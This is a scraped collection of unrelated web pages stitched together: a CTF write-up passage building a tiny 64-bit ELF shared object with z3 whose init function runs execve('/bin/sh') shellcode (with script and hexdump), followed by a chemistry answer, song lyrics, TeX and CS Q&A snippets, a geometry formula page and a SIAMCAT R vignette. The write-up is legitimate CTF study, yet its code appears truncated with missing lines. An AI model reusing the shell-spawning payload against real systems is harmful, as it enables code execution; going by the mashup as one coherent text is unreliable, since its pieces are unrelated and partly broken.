example, if we want to ensure that e_phoff (offset 0x20 in the elf header) points to some byte that contains the value 1, we could create a new symbolic variable phoff (as another 8-bit variable) and write phoff = z3.BitVec('phoff', 8) ## Keeping track of used bytes To be able to constrain not only single bytes, but also multi-byte fields (such as the various 8-byte pointers), we can abuse python’s slice notation. At the same time we can also introduce a symbolic variable to keep track of the required filesize: class Golfer: def __init__(self): self.s = z3.SolverFor('QF_ABV') self.elf = z3.Array('elf', z3.BitVecSort(8), z3.BitVecSort(8)) self.maxsize = z3.BitVec('maxsize', 8) def __getitem__(self, key): if isinstance(key, slice): return z3.Concat(*(self[key.start + i] for i in reversed(range(0, key.stop, key.step or 1)))) else: return self.elf[key] Remember that trailing zero-bytes can be omitted. Therefore we can add a constraint that maxsize only has to be larger than the currently accessed byte if the byte itself is non-zero. We also abuse the slice notation to mean <start>:<length> rather than <start>:<end> because it makes handling symbolic offsets easier. With this we can write the minimal header-only object from above as def file_header(self): self.add(self[0x6] == 1) # "current" ELF version self.add(self[e_version:4] == 1) # "current" ELF version (again?) self.add(self[e_phoff:8] == z3.ZeroExt(64 - 8, self.phoff)) # Collecting Constraints With this setup we could then “simply” modify our ELF (e.g. add a section or constrain another value) and see at which point the loader would complain. While the loader itself is already quite verbose, what helped at this stage was: • adding LD_DEBUG=all increases output • obtaining a debug-build of the loader (archlinux users: asp export glibc, then modify the PKGBUILD to include options=(debug !strip), rebuild with makepkg, done) • coredumpctl <pid> gdb can automagically load a coredump into gdb After spending quite a lot of time in a modify-crash-debug loop, here are the constraints we ended up with: First, we need one loadable segment (type PT_LOAD). This segment must be marked RWX, must be aligned to page boundaries, must fit in the file, and must include our shellcode. Second, we need a dynamic segment (type PT_DYNAMIC). The virtual address of this segment must point to an array of dynamic tags (ELF64_Dyn structs), its memorysize must fit the tag array, and its filesize must be non-zero. Finally, we need four dynamic tags: • a DT_INIT tag, that contains the address of our shellcode • a DT_STRTAB tag, that must point inside our file • a DT_SYMTAB tag, that must point inside out file • a final DT_NULL tag to mark the end of the array We can add these as constraints like so: def write_segments(self): self.add(self[self.phoff + p_flags:4] & 0b111 == 0b111) # ensure RWX self.add((self[self.phoff + p_offset:8] - self[self.phoff + p_vaddr:8]) & 0xfff == 0) # align self.add(self[self.phoff + p_filesz:8] == z3.ZeroExt(64 - 8, self.maxsize)) # load at most all of this file self[self.phoff + p_memsz:8] == self[self.phoff + p_filesz:8]) # make virtual size at least physical size self.add(self[self.phoff + p_align:8] == 0x1000) # page aligned # second PT_DYNAMIC segment self.add(self[self.phoff + self.phentsize + p_type:4] == 2) # PT_DYNAMIC (dynamic segment) self.add(self.ld != 0) # segment pointer must be non-zero self.add(self[self.phoff + self.phentsize + p_memsz:8] == self.ldnum * self.dyn_sz) self.add(self[self.phoff + self.phentsize + p_filesz:8] != 0) # filesz must be != 0 def write_ld(self): self.add(z3.ULT(self.strtab, self.maxsize)) # ensure it's at least within our file self.add(z3.ULT(self.symtab, self.maxsize)) # ensure it's at least within our file tags = [ (DT_INIT, z3.ZeroExt(64 - 8, self.init)), (DT_STRTAB, z3.ZeroExt(64 - 8, self.strtab)), (DT_SYMTAB, z3.ZeroExt(64 - 8, self.symtab)) ] for i, (k, v) in enumerate(tags): tag_offset = self.ld + (i * 0x10) self.add(self[self.ld + len(tags) * 0x10: 8] == DT_NULL) # Shellcode We now have a 64-bit ELF shared object that can be successfully loaded and even jumps to an instruction under our control (at symbolic location init). All that’s now left is to spawn a shell (with execve("/bin/sh", ["/bin/sh"], ...)). The shortest code we could come up with was mov rdi, 0x68732f6e69622f push 0 push rdi mov rsi, rsp xor eax, eax mov al, 0x3b syscall Which we could add to our ELF as follows: def write_shellcode(self): shellcode = ''' mov rdi, 0x68732f6e69622f; push 0; push rdi; mov rsi, rsp; xor eax, eax; mov al, 0x3b; syscall; '''.strip() code = asm.asm(shellcode) for j, b in enumerate(code): However, for optimal golfing we would rather not have our shellcode as one giant, continuous blob, but rather as small chunks. The first “optimization” in that regard is placing the /bin/sh\0 constant somewhere else in memory and using rip-relative addressing (lea rdi, [rip+<something>]). For this we just need to create another symbolic address for the /bin/sh\0 string and then make sure we fix the offset our lea instruction accordingly. As a second step we can also insert jump instructions between our shellcode instructions to jump from one blob to another. Here, we can again leverage z3 to create a constraint that the after an instruction we either place the next shellcode instruction or a relative jump to the next instruction. Together, we end up with the following: def write_shellcode(self): # place /bin/sh into memory for i, x in enumerate(b'/bin/sh\0'): shellcode = ''' lea rdi, [rip+0x0c0c0c0c]; push 0; push rdi; mov rsi, rsp; xor eax, eax; mov al, 0x3b; syscall; '''.strip().splitlines() # create array of instruction locations # first instruction must be at init, later instructions can be wherever ins_loc = [self.init] + [z3.BitVec('ins_%02d' % (j + 1), 8) for j in range(len(shellcode) - 1)] for j, ins in enumerate(shellcode): code = asm.asm(ins) loc = ins_loc[j] fixed = False for i, x in enumerate(code): if x != 0x0c: else: if not fixed: self.add(self[loc + i:4] == z3.SignExt(32 - 8, self.binsh - loc - (i + 4))) fixed = True # if there is a next instruction, make sure it # follows immediately *or* is jumped to if j + 1 < len(ins_loc): loc_after = loc + len(code) next_loc = ins_loc[j + 1] self[loc_after:2] == z3.Concat(next_loc - (loc_after + 2), z3.BitVecVal(0xeb, 8)), # have a jump loc_after == next_loc # be the next instruction )) We used 0x0c as a marker byte to fix-up the lea instruction, and hardcoded the 0xeb for relative jumps. # Computing the smallest ELF With all constraints set up we now only needed a way to minimize the total filesize. However, as we already had a symbolic variable for that (maxsize), we could simply check whether z3 could find a satisfying solution with maxsize < X and decrease X until this was no longer true. With this we ended up with a 163 byte solution, which was good enough to give us both flags (albeit a few days too late to score them): 00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 │·ELF│····│····│····│ 00000010 03 00 3e 00 01 00 00 00 0f 05 01 00 00 00 0f 05 │··>·│····│····│····│ 00000020 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000030 00 00 31 c0 eb 20 38 00 02 00 a3 00 00 00 00 00 │··1·│· 8·│····│····│ 00000040 00 00 a3 00 00 00 00 00 00 00 00 10 00 00 00 00 │····│····│····│····│ 00000050 00 00 02 00 00 00 b0 3b eb be 2f 62 69 6e 2f 73 │····│···;│··/b│in/s│ 00000060 68 00 82 00 00 00 00 00 00 00 48 8d 3d e9 ff ff │h···│····│··H·│=···│ 00000070 ff 6a 00 57 48 89 e6 eb b9 40 30 00 00 00 00 00 │·j·W│H···│·@0·│····│ 00000080 00 00 0c 00 00 00 00 00 00 00 6a 00 00 00 00 00 │····│····│··j·│····│ 00000090 00 00 05 00 00 00 00 00 00 00 20 00 00 00 00 00 │····│····│·· ·│····│ 000000a0 00 00 06 │···│ # Full script Here is the full script for completeness: import z3 from pwnlib import * from pwnlib.util import fiddling context.context(arch='amd64', os='linux') e_ident = 0x0 e_type = 0x10 e_machine = 0x12 e_version = 0x14 e_entry = 0x18 e_phoff = 0x20 e_shoff = 0x28 e_flags = 0x30 e_ehsize = 0x34 e_phentsize = 0x36 e_phnum = 0x38 e_shentsize = 0x3a e_shnum = 0x3c e_shstrndx = 0x3e p_type = 0x00 p_flags = 0x04 p_offset = 0x08 p_filesz = 0x20 p_memsz = 0x28 p_align = 0x30 DT_NULL = 0 DT_STRTAB = 0x5 DT_SYMTAB = 0x6 DT_INIT = 0xc class Golfer: def __init__(self): self.s = z3.SolverFor('QF_ABV') # there are 136 byte entries => 8 bit indices suffice self.ELF = z3.Array('elf', z3.BitVecSort(8), z3.BitVecSort(8)) self.maxsize = z3.BitVec('maxsize', 8) self.phoff = z3.BitVec('phoff', 8) self.shoff = z3.BitVec('shoff', 8) self.flags = z3.BitVec('flag', 4 * 8) self.phentsize = 0x38 # 64-bit program header self.phnum = 2 self.shentsize = 0x40 # 64-bit section header self.shnum = 0 self.shstrndx = z3.BitVec('shstrndx', 8) self.init = z3.BitVec('init', 8) self.code_size = z3.BitVec('codesize', 8) self.ld = z3.BitVec('ld', 8) self.ldnum = 3 self.dyn_sz = 16 self.strtab = z3.BitVec('strtab', 8) self.symtab = z3.BitVec('symtab', 8) self.binsh = z3.BitVec('binsh', 8) self.write_segments() self.write_ld() self.write_shellcode() def __getitem__(self, key): if isinstance(key, slice): return z3.Concat(*(self[key.start + i] for i in reversed(range(0, key.stop, key.step or 1)))) else: return self.ELF[key] self.add(self[0x6] == 1) # "current" ELF version self.add(self[e_version:4] == 1) # "current" ELF version (again?) self.add(self[e_phoff:8] == z3.ZeroExt(64 - 8, self.phoff)) def write_segments(self): self.add(self[self.phoff + p_flags:4] & 0b111 == 0b111) # ensure RWX self.add((self[self.phoff + p_offset:8] - self[self.phoff + p_vaddr:8]) & 0xfff == 0) # align self.add(self[self.phoff + p_filesz:8] == z3.ZeroExt(64 - 8, self.maxsize)) # load at most all of this file self[self.phoff + p_memsz:8] == self[self.phoff + p_filesz:8]) # make virtual size at least physical size self.add(self[self.phoff + p_align:8] == 0x1000) # page aligned # second PT_DYNAMIC segment self.add(self[self.phoff + self.phentsize + p_type:4] == 2) # PT_DYNAMIC (dynamic segment) self.add(self.ld != 0) # segment pointer must be non-zero self.add(self[self.phoff + self.phentsize + p_memsz:8] == self.ldnum * self.dyn_sz) self.add(self[self.phoff + self.phentsize + p_filesz:8] != 0) # filesz must be != 0 def write_ld(self): self.add(z3.ULT(self.strtab, self.maxsize)) # ensure it's at least within our file self.add(z3.ULT(self.symtab, self.maxsize)) # ensure it's at least within our file tags = [ (DT_INIT, z3.ZeroExt(64 - 8, self.init)), (DT_STRTAB, z3.ZeroExt(64 - 8, self.strtab)), (DT_SYMTAB, z3.ZeroExt(64 - 8, self.symtab)) ] for i, (k, v) in enumerate(tags): tag_offset = self.ld + (i * 0x10) self.add(self[self.ld + len(tags) * 0x10: 8] == DT_NULL) def write_shellcode(self): # place /bin/sh into memory for i, x in enumerate(b'/bin/sh\0'): shellcode = ''' lea rdi, [rip+0x0c0c0c0c]; push 0; push rdi; mov rsi, rsp; xor eax, eax; mov al, 0x3b; syscall; '''.strip().splitlines() # create array of instruction locations # first instruction must be at init, later instructions can be wherever ins_loc = [self.init] + [z3.BitVec('ins_%02d' % (j + 1), 8) for j in range(len(shellcode) - 1)] for j, ins in enumerate(shellcode): code = asm.asm(ins) loc = ins_loc[j] fixed = False for i, x in enumerate(code): if x != 0x0c: else: if not fixed: self.add(self[loc + i:4] == z3.SignExt(32 - 8, self.binsh - loc - (i + 4))) fixed = True # if there is a next instruction, make sure it # follows immediately *or* is jumped to if j + 1 < len(ins_loc): loc_after = loc + len(code) next_loc = ins_loc[j + 1] self[loc_after:2] == z3.Concat(next_loc - (loc_after + 2), z3.BitVecVal(0xeb, 8)), # have a jump loc_after == next_loc # be the next instruction )) def get_output(self, concrete_max_size=255): self.s.push() if self.s.check() != z3.sat: self.s.pop() raise ValueError() self.s.pop() m = self.s.model() info = {} info['maxsize'] = m.eval(self.maxsize).as_long() info['phoff'] = m.eval(self.phoff).as_long() info['init'] = m.eval(self.init).as_long() info['ld'] = m.eval(self.ld).as_long() info['strtab'] = m.eval(self.strtab).as_long() info['symtab'] = m.eval(self.symtab).as_long() info['binsh'] = m.eval(self.binsh).as_long() o = bytes(m.eval(self.ELF[i]).as_long() for i in range(concrete_max_size)) return o, info def main(): g = Golfer() lo = 1 hi = 256 elf = None info = None while lo < hi: m = (lo + hi) // 2 try: elf, info = g.get_output(m) hi = m except ValueError: lo = m + 1 if elf: print(f"Got {lo} bytes:") print('maxsize = %d' % info['maxsize']) print('phoff @ 0x%02x' % info['phoff']) print('init @ 0x%02x' % info['init']) print('ld @ 0x%02x' % info['ld']) print('strtab @ 0x%02x' % info['strtab']) print('symtab @ 0x%02x' % info['symtab']) print('binsh @ 0x%02x' % info['binsh']) print(fiddling.hexdump(elf)) with open('gen.so', 'wb') as f: f.write(elf) else: print("I'm sorry") if __name__ == '__main__': main() # Conclusion Super fun golfing challenge that I now regret to not have tackled during the CTF! Also, I’m still super curious how others managed to get 136 byte solutions…
2020-08-09 09:05:29
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.29673486948013306, "perplexity": 8387.024270280053}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439738523.63/warc/CC-MAIN-20200809073133-20200809103133-00145.warc.gz"}
https://www.neetprep.com/ncert-question/228738
9.23 Discuss the principle and method of softening of hard water by synthetic ion-exchange resins. The process of treating permanent hardness of water using synthetic resins is based on the exchange of cations (e.g.,  etc) and anions (e.g.,  etc)   present in water by H$*$ and OH– ions respectively. Synthetic resins are of two types: 1) Cation exchange resins 2) Anion exchange resins Cation exchange resins are large organic molecules that contain the $-S{O}_{3}H$ group. The resin is firstly changed to RNa (from $RS{O}_{3}H$) by treating it with NaCl. This resin then exchanges Na+ ions with $C{a}^{2+}$ and $M{g}^{2+}$ ions, thereby making the water soft. There are cation exchange resins in H+ form. The resins exchange H+ ions for Na+, $C{a}^{2+}$, and $M{g}^{2+}$ ions. Anion exchange resins exchange OH–ions for anions like Cl– ,$HC{O}_{3}$ , and $S{{O}_{4}}^{2-}$ present in water. During the complete process, water first passes through the cation exchange process. The water obtained after this process is free from mineral cations and is acidic in nature. This acidic water is then passed through the anion exchange process where OH–ions neutralize the H+ ions and de-ionize the water obtained.
2023-02-01 16:21:22
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 9, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6022965908050537, "perplexity": 12480.201138141487}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764499946.80/warc/CC-MAIN-20230201144459-20230201174459-00720.warc.gz"}
https://s.awa.fm/track/bd73b76a84ad91823e31
# Stuck in the middle Track byONE OK ROCK 194,625 1,360 • 2015.02.11 • 3:32 AWAで聴く ## 歌詞 What we finally found wasn't what we wanted Wish I could have gone to where we started Back to black I can't see what's around me Back to black hope to gain some control I gave up everything I tried to have it all And I'm stuck in the middle I couldn't have it all now I'm alone And I've been down and out Now I'm stuck in the middle I'll never get to say this is enough Now I'm left with nothing Now I'm left with nothing Now I'm left with nothing Now 手に入れたモノで 壊して虚しくなって 手放してみたらみたで また欲しくなって の繰り返しでハマって 抜けられなくて気づくと 時すでに遅し 切られた切符に振り出しの文字 I tried to have it all And I'm stuck in the middle I couldn't have it all now I'm alone And I've been down and out Now I'm stuck in the middle I'll never get to say this is enough Now I'm left with nothing now Now I'm left with nothing Now I'm left with nothing Now I'm left with nothing Now I'm left with nothing I gave up everything I tried to have it all And I'm stuck in the middle I couldn't have it all now I'm alone And I've been down and out Now I'm stuck in the middle I'll never get to say this is enough Now I'm left with nothing Now I'm left with nothing Now I'm left with nothing Now Now I'm left with nothing Now I'm left with nothing Now I'm left with nothing Now I'm left with nothing このページをシェア ## ONE OK ROCKのアルバム 1曲2019年 13曲2019年 1曲2019年 1曲2018年 14曲2017年 13曲2015年 13曲2013年 ONE OK ROCK の他の曲も聴いてみよう AWAで他の曲を聴く はじめての方限定 1か月無料トライアル実施中! アプリでもっと快適に音楽を楽しもう ダウンロード フル再生
2021-01-17 13:07:49
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8673199415206909, "perplexity": 529.1208022276135}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703512342.19/warc/CC-MAIN-20210117112618-20210117142618-00157.warc.gz"}
http://tex.stackexchange.com/tags/cyrillic/new
# Tag Info ## New answers tagged cyrillic 1 If you want to keep using authblk you have to resort to patching its \author macro, because the strategy with \AB@authors has the consequence of expanding the authors' names to the \cyr... macros. \documentclass[twocolumn, oneside]{article} \usepackage[utf8]{inputenc} \usepackage[english, ukrainian]{babel} \usepackage{authblk} \usepackage{xpatch} ... 0 Solution of this problem is in the following topics: Separator between author names (with LaTeX kernel programming) and How to write totally expanded macro to file (with LaTeX kernel) Unfortunately, I had to abandon the use of authblk package. Full example: \documentclass[]{article} \usepackage[T2A,T1]{fontenc} \usepackage[utf8]{inputenc} ... 4 The error message is indeed far from clear, but the issue is that there's no coverage of Cyrillic in the default sans serif font. Note that scrartcl uses sans serif font for the titles, by default. So you need to set a Cyrillic font also for sans serif, naming it \cyrillicfontsf. A similar problem would raise also for the typewriter type family: set ... Top 50 recent answers are included
2015-01-31 01:12:52
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8973764181137085, "perplexity": 5740.324823071502}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-06/segments/1422122047499.45/warc/CC-MAIN-20150124175407-00048-ip-10-180-212-252.ec2.internal.warc.gz"}
https://byjus.com/surface-area-of-a-cylinder-formula
# Surface Area of a Cylinder Formula A solid geometrical structure that has two circular bases and two parallel faces then it is cylinder. The circular base radius is also the radius of the cylinder and the of the parallel faces if considered as the height of the cylinder. The total area occupied by the surface of the cylinder is the surface area of the cylinder. The unit of measurement of the surface area is in square units. The Surface Area of a Cylinder Formula is $\large Surface\;Area\;of\;a\;Cylinder=2\pi r(r+h)$ Where, r is the radius of the circular base of the cylinder. h is the height of the parallel face of the cylinder ### Solved Examples Question 1: What will be the surface of the cylinder with height 10 cm and diameter of the base is 12 cm. Solution: Given, Height = 10 cm Diameter = 12 cm Hence, $Radius=\frac{d}{2}=\frac{12}{2}=6\;cm$ According to the formula: $2\pi r(r+h)$ $=2\times 3.14 \times 6(6+10)$ $=602.88\;cm^{2}$
2018-01-23 08:11:54
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8000622987747192, "perplexity": 239.61766353077942}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084891791.95/warc/CC-MAIN-20180123072105-20180123092105-00620.warc.gz"}
https://cs.stackexchange.com/questions/86779/maximum-value-reached-in-extended-binary-gcd
# Maximum value reached in extended binary GCD Given positive integer inputs $x$ and $y$ , with $0<x<y$ and $y$ an odd prime (or $\gcd(x,y)=1$ and $y$ odd), the following algorithm computes $x^{-1}\bmod y$ per the (half-)extended binary GCD. All quantities are non-negative. What's an upper bound of the value internally reached by integers $a$ and $d$ , as a function of input $y$ ? I'm content with a number of bits: the objective is deciding a number of words for $a$ and $d$ when dealing with $y$ in the order of 256 bits. • If $x$ is odd then $u\gets x$ ; else $u\gets x+y$ ; • $v\gets y$ ; $a\gets0$ ; $d\gets p-1$ ; • While $v\ne1$ [invariant here and at start of the next while loop: $u$ and $v$ are odd and distinct] • While $v<u$ • $u\gets u-v$ ; $d\gets d+a$ ; • While $u$ is even (that's at least once) • If $d$ is odd then $d\gets d+y$ ; • $u\gets u/2$ ; $d\gets d/2$ ; • $v\gets v-u$ ; $a\gets a+d$ ; • While $v$ is even (that's at least once) • If $a$ is odd then $a\gets a+y$ ; • $v\gets v/2$ ; $a\gets a/2$ ; • $a\gets a\bmod y$ ; that's the desired inverse. Note: I'm aware that by changing $a\gets a+y$ to: if $a<y$ then $a\gets a+y$ ; else $a\gets a-y$ ; and same for $d\gets d+y$ , we keep $a$ and $d$ below $4y$ ; I'm asking what if we do not. There's a similar upper-bound issue in the classical extended binary GCD algorithm using signed variables, as in the Handbook of Applied Cryptography's algorithm 14.61. This question's $d$ (resp. $a$) is similar in role to $-D$ (resp. $C$ and $a$) in that algorithm. Update: I'm leaning towards $\max(a,d)<4y\log_2(y)$ or something on that tune, but fail to make a proof.
2019-07-21 00:41:11
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8573669791221619, "perplexity": 577.0493185960606}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195526799.4/warc/CC-MAIN-20190720235054-20190721021054-00113.warc.gz"}
https://siamcat.embl.de/articles/SIAMCAT_read-in.html
# Introduction This vignette illustrates how to read and input your own data to the SIAMCAT package. We will cover reading in text files from the disk, formatting them and using them to create an object of siamcat-class. The siamcat-class is the centerpiece of the package. All of the input data and result are stored inside of it. The structure of the object is described below in the siamcat-class object section. ## SIAMCAT input Generally, there are three types of input for SIAMCAT: ### Features The features should be a matrix, a data.frame, or an otu_table, organized as follows: features (in rows) x samples (in columns). Sample_1 Sample_2 Sample_3 Sample_4 Sample_5 Feature_1 0.59 0.71 0.78 0.61 0.66 Feature_2 0.00 0.02 0.00 0.00 0.00 Feature_3 0.02 0.00 0.00 0.00 0.20 Feature_4 0.34 0.00 0.13 0.07 0.00 Feature_5 0.06 0.16 0.00 0.00 0.00 Please note that SIAMCAT is supposed to work with relative abundances. Other types of data (e.g. counts) will also work, but not all functions of the package will result in meaningful outputs. An example of a typical feature file is attached to the SIAMCAT package, containing data from a publication investigating the microbiome in colorectal cancer (CRC) patients and controls (the study can be found here: Zeller et al). The metagenomics data were processed with the MOCAT pipeline, returning taxonomic profiles on the species levels (specI): library(SIAMCAT) fn.in.feat <- system.file( "extdata", "feat_crc_zeller_msb_mocat_specI.tsv", package = "SIAMCAT" ) One way to load such data into R could be the use of read.table (Beware of the defaults in R! They are not always useful…) stringsAsFactors = FALSE, check.names = FALSE) # look at some features feat[110:114, 1:2] ## CCIS27304052ST-3-0 CCIS15794887ST-4-0 ## Bacteroides caccae [h:1096] 1.557937e-03 1.761949e-03 ## Bacteroides eggerthii [h:1097] 2.734527e-05 4.146882e-05 ## Bacteroides stercoris [h:1098] 1.173786e-03 2.475838e-03 ## Bacteroides clarus [h:1099] 4.830533e-04 4.589747e-06 ## Methanohalophilus mahii [h:11] 0.000000e+00 0.000000e+00 The metadata should be either a matrix or a data.frame. samples (in rows) x metadata (in columns): Age Gender BMI Sample_1 52 1 20 Sample_2 37 1 18 Sample_3 66 2 24 Sample_4 54 2 26 Sample_5 65 2 30 The rownames of the metadata should match the colnames of the feature matrix. Again, an example of such a file is attached to the SIAMCAT package, taken from the same study: fn.in.meta <- system.file( "extdata", package = "SIAMCAT" ) Also here, the read.table can be used to load the data into R. stringsAsFactors = FALSE, check.names = FALSE) ## age gender bmi diagnosis localization crc_stage fobt ## CCIS27304052ST-3-0 52 1 20 0 NA 0 0 ## CCIS15794887ST-4-0 37 1 18 0 NA 0 0 ## CCIS74726977ST-3-0 66 2 24 1 NA 0 0 ## CCIS16561622ST-4-0 54 2 26 0 NA 0 0 ## CCIS79210440ST-3-0 65 2 30 0 NA 0 1 ## CCIS82507866ST-3-0 57 2 24 0 NA 0 0 ## wif_test ## CCIS27304052ST-3-0 0 ## CCIS15794887ST-4-0 0 ## CCIS74726977ST-3-0 NA ## CCIS16561622ST-4-0 0 ## CCIS79210440ST-3-0 0 ## CCIS82507866ST-3-0 0 ### Label Finally, the label can come in different three different flavours: • Named vector: A named vector containing information about cases and controls. The names of the vector should match the rownames of the metadata and the colnames of the feature data. The label can contain either the information about cases and controls either • as integers (e.g. 0 and 1), • as characters (e.g. CTR and IBD), or • as factors. • Metadata column: You can provide the name of a column in the metadata for the creation of the label. See below for an example. • Label file: SIAMCAT has a function called read.label, which will create a label object from a label file. The file should be organized as follows: • The first line is supposed to read: #BINARY:1=[label for cases];-1=[label for controls] • The second row should contain the sample identifiers as tab-separated list (consistent with feature and metadata). • The third row is then supposed to contain the actual class labels (tab-separated): 1 for each case and -1 for each control. An example file is attached to the package again, if you want to have a look at it. For our example dataset, we can create the label object out of the metadata column called diagnosis: label <- create.label(meta=meta, label="diagnosis", case = 1, control=0) When we later plot the results, it might be nicer to have names for the different groups stored in the label object (instead of 1 and 0). We can also supply them to the create.label function: label <- create.label(meta=meta, label="diagnosis", case = 1, control=0, p.lab = 'cancer', n.lab = 'healthy') ## Label used as case: ## 1 ## Label used as control: ## 0 ## + finished create.label.from.metadata in 0.001 s label$info ## healthy cancer ## -1 1 Note: If you have no label information for your dataset, you can still create a SIAMCAT object from your features alone. The SIAMCAT object without label information will contain a TEST label that can be used for making holdout predictions. Other functions, e.g. model training, will not work on such an object. ## LEfSe format files LEfSe is a tool for identification of associations between micriobial features and up to two metadata. LEfSe uses LDA (linear discriminant analysis). LEfSe input file is a .tsv file. The first few rows contain the metadata. The following row contains sample names and the rest of the rows are occupied by features. The first column holds the row names: label healthy healthy healthy cancer cancer age 52 37 66 54 65 gender 1 1 2 2 2 Sample_info Sample_1 Sample_2 Sample_3 Sample_4 Sample_5 Feature_1 0.59 0.71 0.78 0.61 0.66 Feature_2 0.00 0.02 0.00 0.00 0.00 Feature_3 0.02 0.00 0.00 0.00 0.00 Feature_4 0.34 0.00 0.43 0.00 0.00 Feature_5 0.56 0.56 0.00 0.00 0.00 An example of such a file is attached to the SIAMCAT package: fn.in.lefse<- system.file( "extdata", "LEfSe_crc_zeller_msb_mocat_specI.tsv", package = "SIAMCAT" ) SIAMCAT has a dedicated function to read LEfSe format files. The read.lefse function will read in the input file and extract metadata and features: meta.and.features <- read.lefse(fn.in.lefse, rows.meta = 1:6, row.samples = 7) meta <- meta.and.features$meta feat <- meta.and.features\$feat We can then create a label object from one of the columns of the meta object and create a siamcat object: label <- create.label(meta=meta, label="label", case = "cancer") ## Label used as case: ## cancer ## Label used as control: ## healthy ## + finished create.label.from.metadata in 0.294 s ## metagenomeSeq format files 